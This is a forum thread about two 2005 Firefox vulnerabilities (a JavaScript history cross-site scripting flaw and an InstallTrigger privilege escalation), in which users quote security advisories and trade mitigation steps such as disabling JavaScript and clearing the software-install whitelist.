Firefox Critical Flaws Discovered

Ice Czar

Ice Czar

Inscrutable
Joined
Jul 8, 2001
Messages
27,174
http://secunia.com/advisories/15292/

Two vulnerabilities have been discovered in Firefox, which can be exploited by malicious people to conduct cross-site scripting attacks and compromise a user's system.

1) The problem is that "IFRAME" JavaScript URLs are not properly protected from being executed in context of another URL in the history list. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an arbitrary site.

2) Input passed to the "IconURL" parameter in "InstallTrigger.install()" is not properly verified before being used. This can be exploited to execute arbitrary JavaScript code with escalated privileges via a specially crafted JavaScript URL.

Successful exploitation requires that the site is allowed to install software (default sites are "update.mozilla.org" and "addons.mozilla.org").

A combination of vulnerability 1 and 2 can be exploited to execute arbitrary code.

NOTE: Exploit code is publicly available.

The vulnerabilities have been confirmed in version 1.0.3. Other versions may also be affected.

Solution:

Disable JavaScript.

to that end
noscript.exe (directdownload)
indirect> http://www.sarc.com/avcenter/venc/data/win.script.hosting.html

and or

AnologX script defender
 
Ice Czar said:
Successful exploitation requires that the site is allowed to install software (default sites are "update.mozilla.org" and "addons.mozilla.org").
Click to expand...
Alternate solution: don't install software from non-trusted sites. Just pointing out that for most people using FF (certainly most people on this forum) the JS disable is overkill.
 
youd think so
but then again can you recall how many sutes youve allowed javascript on in the past
(isnt it rule based?)
I run with WSH disabled and the AnalogX intercepts by default anyway
(department of redundancy department :p )
only turning it on when I cant get access to a feature without it ;)
 
Thanks, Ice Czar! I applied the patches and I feel warm and safe. Well, I will stay vigilant ;)

The title scared the shit outta me, so I patched up as quickly as I saw it :eek:
 
well they arent really patches
more an added security precaution \ layer ;)
 
Can you just go to "tools/options/web features" and un-check the "enable javascript" box? (ver 1.0.3 btw)
 
well not a problem for linux, programs do not have auto-exec permission
 
Monkey34 said:
Can you just go to "tools/options/web features" and un-check the "enable javascript" box? (ver 1.0.3 btw)
Click to expand...

Im not sure
 
Ice Czar said:
youd think so
but then again can you recall how many sites youve allowed javascript on in the past
Click to expand...
Allowing JS at sites and allowing program install at sites are two different things, though. I haven't needed to expand my install-allow list ever.
 
I had to do that yesterday for a clients box to get McAfee to update

seems there is an update
http://secunia.com/advisories/15292/
Solution:
1) Disable JavaScript.

2) Disable software installation: Options --> Web Features --> "Allow web sites to install software"

NOTE: A temporary solution has been added to the sites "update.mozilla.org" and "addons.mozilla.org" where requests are redirected to "do-not-add.mozilla.org". This will stop the publicly available exploit code using a combination of vulnerability 1 and 2 to execute arbitrary code in the default settings of Firefox.


https://do-not-add.mozilla.org/
To address security concerns, we have made a number of changes, including temporarily changing the URL for this site. If prompted, please DO NOT add this new URL (do-not-add.mozilla.org) to your Allowed Sites or White List.
Click to expand...

which I gather is to address the cross-site scripting attacks

http://www.cgisecurity.com/articles/xss-faq.shtml

"What is Cross Site Scripting?"

Cross site scripting (also known as XSS) occurs when a web application gathers malicious data from a user. The data is usually gathered in the form of a hyperlink which contains malicious content within it. The user will most likely click on this link from another website, instant message, or simply just reading a web board or email message. Usually the attacker will encode the malicious portion of the link to the site in HEX (or other encoding methods) so the request is less suspicious looking to the user when clicked on. After the data is collected by the web application, it creates an output page for the user containing the malicious data that was originally sent to it, but in a manner to make it appear as valid content from the website. Many popular guestbook and forum programs allow users to submit posts with html and javascript embedded in them. If for example I was logged in as "john" and read a message by "joe" that contained malicious javascript in it, then it may be possible for "joe" to hijack my session just by reading his bulletin board post. Further details on how attacks like this are accomplished via "cookie theft" are explained in detail below.

"What are the threats of Cross Site Scripting?"

Often attackers will inject JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable application to fool a user (Read below for further details) in order to gather data from them. Everything from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible. New malicious uses are being found every day for XSS attacks.
Click to expand...
 
http://www.techworld.com/news/index.cfm?RSS&NewsID=3619

An attacker could create a malicious page using frames and a JavaScript history flaw to make software installations appear to be coming from a "trusted" site. By default, Firefox allows software installations from update.mozilla.org and addons.mozilla.org, but users can add their own sites to this whitelist.

The second part of the exploit triggers software installation using an input verification bug in the "IconURL" parameter in the install mechanism. The effect is that a user could click on an icon and trigger the execution of malicious JavaScript code. Because the code is executed from the browser's user interface, it has the same privileges as the user running Firefox, according to researchers.

Mozilla Foundation said it has protected most users from the exploit by altering the software installation mechanism on its two whitelisted sites.
However, users may be vulnerable if they have added other sites to the whitelist, it warned.

"We believe this means that users who have not added any additional sites to their software installation whitelist are no longer at risk," Mozilla Foundation said in a statement published on Mozillazine.org.
Click to expand...

............................
 
The Mozilla Foundation has made changes to our update servers that will protect users from this arbitrary code execution exploit. Users who have added other extension or theme sites to the software installation whitelist should remove them until a fixed version of Firefox is available.
Select the "Options" dialog from the "Tools" menu
Select the "Web Features" icon
Click the "Allowed Sites" button on the same line as the "Allow web sites to install software" checkbox
Click the "Remove All Sites" button
Click "OK"
To prevent the script injection exploit from stealing cookies or other sensitive data disable Javascript before visiting untrustworthy sites. In Firefox:

Select the "Options" dialog from the "Tools" menu
Select the "Web Features" icon
Uncheck the "Enable Javascript" checkbox
Click "OK"
Click to expand...
Straight from "Mozilla Foundation Security Advisory 2005-42"
Just un-check the boxes......its as simple as that ( untill a real fix is implimented ).
 
You must log in or register to reply here.
Back
Top